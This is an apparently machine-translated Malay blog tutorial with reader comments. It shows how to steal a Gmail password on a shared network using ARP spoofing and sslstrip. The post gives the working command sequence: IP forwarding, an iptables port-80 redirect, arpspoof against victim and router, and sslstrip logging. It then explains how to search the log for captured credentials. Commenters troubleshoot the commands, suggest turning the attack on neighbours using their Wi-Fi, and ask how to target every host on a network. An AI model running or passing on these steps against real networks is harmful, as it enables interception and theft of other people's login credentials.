Helo Blogger.
Untuk hari ini, saya mempunyai sedikit contoh betapa berbahayanya ia dapat disambungkan di mana-mana rangkaian tanpa keselamatan yang sangat disukai oleh kita.
Untuk hari ini, saya akan menggunakan ArpSpoofing dengan Sslstrip untuk mendapatkan kata laluan Gmail. Untuk menjadikan persekitaran lebih terkawal, saya telah membuat akaun bernama "testarp@gmail.com".
Oleh kerana saya sangat tidak suka mukadimah, mari kita mula berniaga.
PERSEKITARAN
Untuk ujian ini yang kami ada adalah seperti berikut:
1. Penyerang: Ini adalah komputer desktop atau desktop saya yang mempunyai Debian Wheezy. Dari repositori anda boleh memasang sslstrip y dsniff untuk mempunyai harpspoofing
2. Mangsa: Mangsa adalah Tablet Android yang hanya mahu melihat suratnya melalui penyemak imbas.
3. Medium: Yang tengah adalah milik saya Penghala Cisco DPC2425
ALAMAT.
Alamat penyerang: 172.26.0.2
Alamat Penghala: 172.26.0.1
Alamat Mangsa: 172.26.0.8
SERANGAN:
Perkara pertama yang akan kita lakukan untuk serangan ini adalah dengan mengaktifkan ke depan supaya komputer kita dapat meneruskan maklumat tersebut kepada mangsa tanpa mereka perhatikan. (Jika tidak, ia akan menjadi serangan penolakan perkhidmatan)
Untuk itu kami akan menggunakan:
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080
Sekarang jika kita melakukan ekor -f desdelinux kita melihat maklumat secara langsung dan langsung
Jadi bagaimana kita mendapatkan apa yang kita mahukan?
Mari masukkan mel kami terlebih dahulu di Tablet. Semasa log masuk, kami melihat beribu-ribu perkara muncul di konsol kami.
Setelah selesai, mari buka fail kami "desdelinux” dengan nano
nano desdelinux
dengan Control + W kita mencari sesuatu yang dipanggil SECURE POST.
Dan kita akan melihat sesuatu seperti ini.
Antara garis besar yang tidak dapat dilihat ialah e-mel dan kata laluan mangsa.
Oleh itu, kami berlari ke kanan sehingga akhirnya kami melihat cahaya di hujung terowong.
Pada kesempatan yang lain, kita akan melihat bagaimana kita dapat melindungi diri kita sedikit dari serangan ini.
salam
Saya mengambil kesempatan ini untuk mengatakan bahawa ketika catatan itu diterbitkan, perintahnya tidak betul.
Perintah iptables di akhir tidak mempunyai 8080 yang berada di baris lain. Dan kemudian arahan arpspoof semuanya berada pada baris yang sama. Setiap arahan berada pada baris yang berbeza.
Semoga editor melihatnya dan dapat memperbaikinya.
Greetings.
Saya telah membuat pembetulan yang anda sebutkan, adakah itu baik?
Sekiranya anda akan memasukkan kod dalam entri pilihan, gunakan paparan HTML, dan sahkan bahawa artikel itu betul sebelum menghantarnya ke belum selesai. Terima kasih.
Sangat menggembirakan apabila mengetahui bahawa kita yang tidak mempunyai pengetahuan sangat terdedah. Maklumat yang sangat baik walaupun saya memahami sedikit subjek saya menyedari kepentingannya. Terima kasih!
salam
Tetapi itu hanya berfungsi jika penyerang dan mangsa berada di rangkaian yang sama. Walau bagaimana pun, menurut saya bahawa jika (berada di rangkaian yang sama) anda menyambung menggunakan HTTPS yang tidak berlaku kerana data dienkripsi SEBELUM meninggalkan mesin anda. Sekiranya anda menyambung dengan HTTP (tanpa S) saya berpendapat bahawa walaupun melihat kabel rangkaian anda akan melihat kuncinya.
Ianya tidak betul. Saya menggodam kata laluan gmail dan jika anda perhatikan gmail menggunakan https. Jadi? Intinya adalah bahawa walaupun https selamat, ia bergantung pada http. Oleh itu, ia tidak begitu selamat.
Jangan mengaku banyak mengenai https yang S bukan untuk Superman tetapi untuk "selamat"
ia berfungsi dengan atau tanpa https, saya telah mencubanya dengan distro linux yang lebih khusus dan ia berfungsi tanpa masalah
Anda boleh menggunakannya dengan tepat untuk memberi pengajaran kepada mereka yang mencuri Wi-Fi anda. 😀
Kurang lebih seperti apa yang mereka katakan pada masa lalu di blog Chema Alonso:
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html
Ostia, hebat apa yang dilakukannya! / Dan kemudian mereka memberitahu paranoid saya setiap kali saya menggunakan VPN ketika mereka pergi untuk memeriksa akaun bank…). By the way anda harus melihat bagaimana orang-orang sinis dalam komen ... jika pada akhirnya ia mencuri ...
Sekarang kita perlu mengikuti tutorial bagaimana membuat dan menawarkan perkhidmatan VPN anda sendiri.
Kisah yang anda pautkan sangat menarik, malah sepertinya layak untuk buku novel, dan ini membuat saya teringat ketika saya menggunakan internet jiran-jiran saya dan walaupun saya mengatakan bahawa saya tahu topiknya, saya rasa saya tidak pernah dapat melihat dimensi bahaya yang sebenarnya boleh saya alami terakhir, untungnya saya, mereka hanya menukar kata laluan menjadi WPA2 dan di situlah kisah saya dengan ISP bermula haha
Itulah sebabnya tajuk itu mengatakan Sslstrip beraksi.
Ia berfungsi, selagi penyerang berada di tengah
Apakah gelombang yang anda lakukan pada prisma? -.-
No.
Apa tunggu lagi untuk menghantar permintaan anda XD
berkaitan
jawatan yang baik
Menariknya, saya akan melakukan ujian pendidikan nanti ... Mungkin saya boleh membuang kata laluan ke WiFi dan bersenang-senang sedikit 😛
Secara kebetulan, bolehkah anda melakukan sesuatu yang serupa dengan menghantar halaman yang berbeza ke halaman yang diminta oleh sasaran? Contohnya, mereka mahu membuka Facebook dan saya mengarahkannya ke Google? 😛
Ya. Tetapi semuanya adalah gulungan yang sangat berbeza.
Mungkin saya akan hantar kemudian.
catatan yang sangat baik, topik-topik ini sangat mendidik, sekarang kita harus dapat mengatasi serangan ini, kerana ada yang (seperti saya) menyambung ke rangkaian awam (misalnya universiti) sangat berguna untuk mengelakkannya.
Salam!
Ia tidak berfungsi untuk saya 🙁
Sesuatu yang gagal saya di sini, selain kenyataan bahawa sambungan https disulitkan melalui sijil pelayan (setelah anda mempunyai sijil pada mesin anda, penyemak imbas anda mengendalikan penyulitan) dengan iptables anda mengalihkan port 80 (http), bukan 443 yang https
Saya fikir begitu juga. Intinya adalah bahawa walaupun https "selamat", sayangnya bergantung pada http. Oleh itu, sslstrip memanfaatkannya, menjadikan penyemak imbas mempercayai bahawa ia menggunakan kelayakan https tetapi tidak.
tahi suci! tetapi penyemak imbas harus melihat amaran seperti "sijil ini berasal dari laman web yang mencurigakan atau semacamnya" ... Saya pasti akan melakukan ujian XD
Tidak, tidak ada yang keluar.
Ia akhirnya berjaya untuk saya
Saya dihubungkan di rangkaian WEP dengan kata laluan, dan itu menunjukkan kata laluan terus kepada saya.
Pertanyaan. Bolehkah anda melakukan prosedur yang sama tetapi untuk semua komputer yang disambungkan ke rangkaian, bukannya mempunyai satu mangsa?
Ya awak boleh. Tetapi saya belum melakukan eksperimen. Cuba sendiri dan beritahu kami bagaimana kelanjutannya.
Satu-satunya perkara yang saya dapat ialah mesin mangsa tidak berfungsi, tetapi sslstrip tidak menunjukkan apa-apa kepada saya: /
Anda harus mematikan firewall sebentar. Atau sekurang-kurangnya aktifkan sambungan masuk.
Probe dan saya hanya dapat melihat nama pengguna dan kata laluan halaman facebook, di gmail saya tidak menemui hasil dalam log, juga saya hanya memerlukan sebaris arpspoof «arpspoof -i -t«. Sebaliknya, mesin mangsa tidak dapat membuka beberapa halaman. Saya akan terus menyiasat, ia sangat menarik. Bantuan bagi mereka yang menggunakan Manjaro, pakej yang hendak dipasang adalah: dsniff (berikut adalah arpspoff), berpintal dan python2-pyopenssl. Sslstrip boleh dimuat turun dari sini: http://www.thoughtcrime.org/software/sslstrip/
Untuk menjalankannya $ python2 sslstrip.py
Greetings.
Itu tidak keluar tetapi garis arpspoof adalah: #arpspoof -i int -t ip-mangsa ip-router
Lihatlah saya melakukan apa yang anda katakan:
echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
masalahnya adalah bahawa mangsa yang merupakan komputer lain yang saya ada di sini di bilik saya, saya tidak mempunyai hubungan dengan titik bahawa saya harus menghidupkan semula penghala, apa yang boleh saya bantu saya.
Perkara lain, saya bekerja dengan mesin maya, dan ketika saya menjalankan perintah iwconfig, wlan0 tidak muncul, atau ketika saya menjalankan ifconfig, bagaimanapun, jika saya mempunyai internet di mesin maya saya, bagaimana dengan antara muka eth0.